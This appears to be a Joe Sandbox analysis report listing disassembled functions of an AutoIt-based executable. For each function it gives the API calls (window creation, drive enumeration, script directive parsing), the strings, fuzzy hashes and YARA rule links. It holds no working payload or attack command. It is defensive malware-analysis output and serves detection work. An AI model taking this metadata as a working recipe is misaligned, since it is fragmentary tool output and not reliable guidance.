Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 1f13f22ae962680c7f711bf01db35d6de63866653481ce10f4ebbb98e4e57e5a
Instruction ID: d89f515e5bd2bdff752a00fc94bfd069ead1d438b4a75e0e088fa02664867139
Opcode Fuzzy Hash: 1f13f22ae962680c7f711bf01db35d6de63866653481ce10f4ebbb98e4e57e5a
Instruction Fuzzy Hash: 70918DB2108306EFD7109F64DC08E7B7BE9FF89721F100A29FA66965A0D774D844EB52

Function 000E74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 000E74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000E759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000E75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000E75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 000E7633
GetClientRect.USER32(00000000,?), ref: 000E763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 000E7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000E7692
GetStockObject.GDI32(00000011), ref: 000E76A2
SelectObject.GDI32(00000000,00000000), ref: 000E76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000E76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E76BF
DeleteDC.GDI32(00000000), ref: 000E76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000E76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 000E770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 000E7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000E775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 000E776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 000E779B
GetStockObject.GDI32(00000011), ref: 000E77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000E77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000E77BB

Strings

static, xrefs: 000E767D, 000E7795
AutoIt v3, xrefs: 000E762B
msctls_progress32, xrefs: 000E773C
DISPLAY, xrefs: 000E7688

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 113d9dba0701441d4360ebb9b60b8c0d04c7ec3cb4fcec6c77184cbe5bfb479f
Instruction ID: 79c16c815a08abcf74ce86e63aac046c4be8807ac944ca9b7129aa0437ab7da3
Opcode Fuzzy Hash: 113d9dba0701441d4360ebb9b60b8c0d04c7ec3cb4fcec6c77184cbe5bfb479f
Instruction Fuzzy Hash: 32A13B71A40615BFEB14DBA4DC4AFBA7BB9EF04710F008114FA15A76E1CBB4AD50CB64

Function 000DAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000DAD1E
GetDriveTypeW.KERNEL32(?,000FFAC0,?,\\.\,000FF910), ref: 000DADFB
SetErrorMode.KERNEL32(00000000,000FFAC0,?,\\.\,000FF910), ref: 000DAF59

Strings

FileBackedVirtual, xrefs: 000DAF28
Network, xrefs: 000DAE39
PhysicalDrive, xrefs: 000DADA7
SATA, xrefs: 000DAF0C
MMC, xrefs: 000DAF1A
CDROM, xrefs: 000DAE2F
SSD, xrefs: 000DAE86
Fixed, xrefs: 000DAE43
Virtual, xrefs: 000DAF21
Removable, xrefs: 000DAE4D
1394, xrefs: 000DAEDB
SAS, xrefs: 000DAF05
Unknown, xrefs: 000DAE1B, 000DAEBF
USB, xrefs: 000DAEF0
ATA, xrefs: 000DAED4
\\.\, xrefs: 000DAD70
RAID, xrefs: 000DAEF7
ATAPI, xrefs: 000DAECD
RAMDisk, xrefs: 000DAE25
SSA, xrefs: 000DAEE2
SCSI, xrefs: 000DAEC6
Fibre, xrefs: 000DAEE9
iSCSI, xrefs: 000DAEFE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 147fab492b7a335606d81319d44a0221d228a39a93cf45f680c105b68531691f
Instruction ID: d136dd31ac0fb1639dc3fa0e6a91f3f46fd654673fe05e031310160d1330085f
Opcode Fuzzy Hash: 147fab492b7a335606d81319d44a0221d228a39a93cf45f680c105b68531691f
Instruction Fuzzy Hash: 515193B174A309ABCB60DB90D982DBD73A1EB0A70072084A7E407E7391DF719D11DB67

Function 000768DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00076931
__wcsnicmp.LIBCMT ref: 00076949
__wcsnicmp.LIBCMT ref: 00076961
__wcsnicmp.LIBCMT ref: 00076979
__wcsnicmp.LIBCMT ref: 00076991
__wcsnicmp.LIBCMT ref: 000769A9
__wcsnicmp.LIBCMT ref: 000769C1
__wcsnicmp.LIBCMT ref: 000769D5
__wcsnicmp.LIBCMT ref: 00076A16
__wcsnicmp.LIBCMT ref: 00076A2A
__wcsnicmp.LIBCMT ref: 00076A3E
__wcsnicmp.LIBCMT ref: 00076A52

Strings

#cs, xrefs: 000769CF, 00076A24
Unterminated group of comments, xrefs: 000AE403
#include, xrefs: 000769A3
#requireadmin, xrefs: 0007695B
#notrayicon, xrefs: 00076943
Bad directive syntax error, xrefs: 000AE31A
#comments-end, xrefs: 00076A38
#OnAutoItStartRegister, xrefs: 00076973
#include-once, xrefs: 0007698B
#pragma compile, xrefs: 0007692B
Cannot parse #include, xrefs: 000AE3F0
#comments-start, xrefs: 000769BB, 00076A10
#ce, xrefs: 00076A4C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 4ae0f6dce94556a0b2bcb1d6f5f94ce24cec38bc707f6dabf03e9b38cdd956c1
Instruction ID: c5f3d6b06fb66c33f9b82f280f514ae5f4cbcb6384b3f631a2203c8c61041060
Opcode Fuzzy Hash: 4ae0f6dce94556a0b2bcb1d6f5f94ce24cec38bc707f6dabf03e9b38cdd956c1
Instruction Fuzzy Hash: CF812AB1A006067ACF20ABA0DC46FFE77A8EF15700F048024FA4A6B183EB76DE45D655

Function 000F9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 000F9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000F9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 000F9BA7

Strings

0, xrefs: 000F9BE4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 2e99a1495afb13c803cef353d125187b3f58436775c2312ca82c99a9ce3f0e36
Instruction ID: 5146bf8cd5aad470a7b1416c31335fbfa080a24ef1845930e1ba54cbfebaf4b2
Opcode Fuzzy Hash: 2e99a1495afb13c803cef353d125187b3f58436775c2312ca82c99a9ce3f0e36
Instruction Fuzzy Hash: 1302F130108309AFE765CF14C848BBABBE5FF49314F04852DFA99D6AA1C735D944EB92

Function 000FA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 000FA903
SetTextColor.GDI32(?,?), ref: 000FA907
GetSysColorBrush.USER32(0000000F), ref: 000FA91D
GetSysColor.USER32(0000000F), ref: 000FA928
CreateSolidBrush.GDI32(?), ref: 000FA92D
GetSysColor.USER32(00000011), ref: 000FA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 000FA953
SelectObject.GDI32(?,00000000), ref: 000FA964
SetBkColor.GDI32(?,00000000), ref: 000FA96D
SelectObject.GDI32(?,?), ref: 000FA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 000FA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000FA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 000FA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000FA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000FAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 000FAA32
DrawFocusRect.USER32(?,?), ref: 000FAA3D
GetSysColor.USER32(00000011), ref: 000FAA4B
SetTextColor.GDI32(?,00000000), ref: 000FAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000FAA67
SelectObject.GDI32(?,000FA5FA), ref: 000FAA7E
DeleteObject.GDI32(?), ref: 000FAA89
SelectObject.GDI32(?,?), ref: 000FAA8F
DeleteObject.GDI32(?), ref: 000FAA94
SetTextColor.GDI32(?,?), ref: 000FAA9A
SetBkColor.GDI32(?,?), ref: 000FAAA4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 05c9314694f1080914a8a22f7b4d0510ad9715c19962ddf159d401203f885746
Instruction ID: d4b6f47ac850f03419507d0a416d93ecc0587c75f74746f3674e07ec5d6a61c1
Opcode Fuzzy Hash: 05c9314694f1080914a8a22f7b4d0510ad9715c19962ddf159d401203f885746
Instruction Fuzzy Hash: 3F513DB1900209BFEB10DFA4DC48EBE7BB9FF09320F114625FA15AB6A1D7759940EB50

Function 000F89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000F8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000F8AD2
CharNextW.USER32(0000014E), ref: 000F8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000F8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000F8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000F8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000F8B86
SetWindowTextW.USER32(?,0000014E), ref: 000F8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000F8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 000F8C1F
_memset.LIBCMT ref: 000F8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000F8C8D
_memset.LIBCMT ref: 000F8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 000F8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 000F8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 000F8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 000F8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000F8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000F8EB4
DrawMenuBar.USER32(?), ref: 000F8EC3
SetWindowTextW.USER32(?,0000014E), ref: 000F8EEB

Strings

0, xrefs: 000F8E55

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 7c29d8f9bb9de33ee75a77a31b09ca8072e6005dd3217b55d7f816c5b0d6503e
Instruction ID: 359230c459118c8b9476036eb2b6bd45656bc91a3d946f80e7c68fa5becbab2a
Opcode Fuzzy Hash: 7c29d8f9bb9de33ee75a77a31b09ca8072e6005dd3217b55d7f816c5b0d6503e
Instruction Fuzzy Hash: F5E16E7190020DAFEF209F60CC84EFE7BB9EF05710F108156FA15AA691DB748A84EF61

Function 000F488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000F49CA
GetDesktopWindow.USER32 ref: 000F49DF
GetWindowRect.USER32(00000000), ref: 000F49E6
GetWindowLongW.USER32(?,000000F0), ref: 000F4A48
DestroyWindow.USER32(?), ref: 000F4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000F4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000F4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000F4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 000F4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000F4B09
IsWindowVisible.USER32(?), ref: 000F4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000F4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000F4B58
GetWindowRect.USER32(?,?), ref: 000F4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 000F4B96
GetMonitorInfoW.USER32(00000000,?), ref: 000F4BB0
CopyRect.USER32(?,?), ref: 000F4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 000F4C32

Strings

tooltips_class32, xrefs: 000F4A96
(, xrefs: 000F4BA3
0, xrefs: 000F4975

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 15224977da34d887290f4de44c6c4c7d43deafa664d2f05f6e14b868e746dca5
Instruction ID: db0a42b53dd6373ccb9a3cf9560d0ea29afb534e218c5368e499b53d82d72712
Opcode Fuzzy Hash: 15224977da34d887290f4de44c6c4c7d43deafa664d2f05f6e14b868e746dca5
Instruction Fuzzy Hash: A1B18C71608341AFDB44DF64C844B6BBBE4FF84710F00891CFA999B2A2DB75E805DB96

Function 000D449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 000D44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000D44D2
_wcscpy.LIBCMT ref: 000D4500
_wcscmp.LIBCMT ref: 000D450B
_wcscat.LIBCMT ref: 000D4521
_wcsstr.LIBCMT ref: 000D452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000D4548
_wcscat.LIBCMT ref: 000D4591
_wcscat.LIBCMT ref: 000D4598
_wcsncpy.LIBCMT ref: 000D45C3

Strings

\VarFileInfo\Translation, xrefs: 000D4540
04090000, xrefs: 000D457E
DefaultLangCodepage, xrefs: 000D45AB
%u.%u.%u.%u, xrefs: 000D4626
StringFileInfo\, xrefs: 000D451B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: c3a675da984e658aa1d941ee824633fb3b8680be21744814c7115d26b256ea44
Instruction ID: 05f5525d3beed440b11d4654aac29a5670a3abe0955db20060b6572bb3c49ed5
Opcode Fuzzy Hash: c3a675da984e658aa1d941ee824633fb3b8680be21744814c7115d26b256ea44
Instruction Fuzzy Hash: 9E41A0729013157BDF10BB749C46EFF76ACDF45710F04006AFA05A6283EB34AA11A6A6

Function 000727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000728BC
GetSystemMetrics.USER32(00000007), ref: 000728C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000728EF
GetSystemMetrics.USER32(00000008), ref: 000728F7
GetSystemMetrics.USER32(00000004), ref: 0007291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00072939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00072949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0007297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00072990
GetClientRect.USER32(00000000,000000FF), ref: 000729AE
GetStockObject.GDI32(00000011), ref: 000729CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 000729D5

Part of subcall function 00072344: GetCursorPos.USER32(?), ref: 00072357
Part of subcall function 00072344: ScreenToClient.USER32(001357B0,?), ref: 00072374
Part of subcall function 00072344: GetAsyncKeyState.USER32(00000001), ref: 00072399
Part of subcall function 00072344: GetAsyncKeyState.USER32(00000002), ref: 000723A7

SetTimer.USER32(00000000,00000000,00000028,00071256), ref: 000729FC

Strings

AutoIt v3 GUI, xrefs: 00072974

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 9dd42655f4cf99ac96212c4b410c3d9a5b6ca653f73aa4212b0ad39d25312085
Instruction ID: 0aa521bf86463b96a609f590b6d8d072278a996ca921ff35dd6f45ac7543ef4a
Opcode Fuzzy Hash: 9dd42655f4cf99ac96212c4b410c3d9a5b6ca653f73aa4212b0ad39d25312085
Instruction Fuzzy Hash: 66B16D71A0020AEFEB14DFA8DC45BAD7BB5FF08714F118129FA19E7290DB78A840DB55

Function 000CA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000CA47A
__swprintf.LIBCMT ref: 000CA51B
_wcscmp.LIBCMT ref: 000CA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000CA583
_wcscmp.LIBCMT ref: 000CA5BF
GetClassNameW.USER32(?,?,00000400), ref: 000CA5F6
GetDlgCtrlID.USER32(?), ref: 000CA648
GetWindowRect.USER32(?,?), ref: 000CA67E
GetParent.USER32(?), ref: 000CA69C
ScreenToClient.USER32(00000000), ref: 000CA6A3
GetClassNameW.USER32(?,?,00000100), ref: 000CA71D
_wcscmp.LIBCMT ref: 000CA731
GetWindowTextW.USER32(?,?,00000400), ref: 000CA757
_wcscmp.LIBCMT ref: 000CA76B

Part of subcall function 0009362C: _iswctype.LIBCMT ref: 00093634

Strings

%s%u, xrefs: 000CA515

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: a3fadfed671685e1f45825a23a93b5ad757d1ca8c2020b81374a00d7e2d3eb33
Instruction ID: f8c67e55c9e7ac355b1cd447235eeff0a4cd5f305b895b7ab3b77f3570589627
Opcode Fuzzy Hash: a3fadfed671685e1f45825a23a93b5ad757d1ca8c2020b81374a00d7e2d3eb33
Instruction Fuzzy Hash: 13A1BD3120470AABDB18DF60C884FEEB7E8FF45318F00862DE999C2191DB34E945CB92

Function 000CAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 000CAF18
_wcscmp.LIBCMT ref: 000CAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 000CAF51
CharUpperBuffW.USER32(?,00000000), ref: 000CAF6E
_wcscmp.LIBCMT ref: 000CAF8C
_wcsstr.LIBCMT ref: 000CAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 000CAFD5
_wcscmp.LIBCMT ref: 000CAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 000CB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 000CB055
_wcscmp.LIBCMT ref: 000CB065
GetClassNameW.USER32(00000010,?,00000400), ref: 000CB08D
GetWindowRect.USER32(00000004,?), ref: 000CB0F6

Strings

@, xrefs: 000CAEF9
ThumbnailClass, xrefs: 000CAFE0, 000CB060

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 13e3384830eaca6f82e645604405140c25bc7782bd117caf69dd02e6a8fce9e4
Instruction ID: 833e3859952c8d512bd6b2107f3d1c83b2846594483da076b8d7415d6332a3b0
Opcode Fuzzy Hash: 13e3384830eaca6f82e645604405140c25bc7782bd117caf69dd02e6a8fce9e4
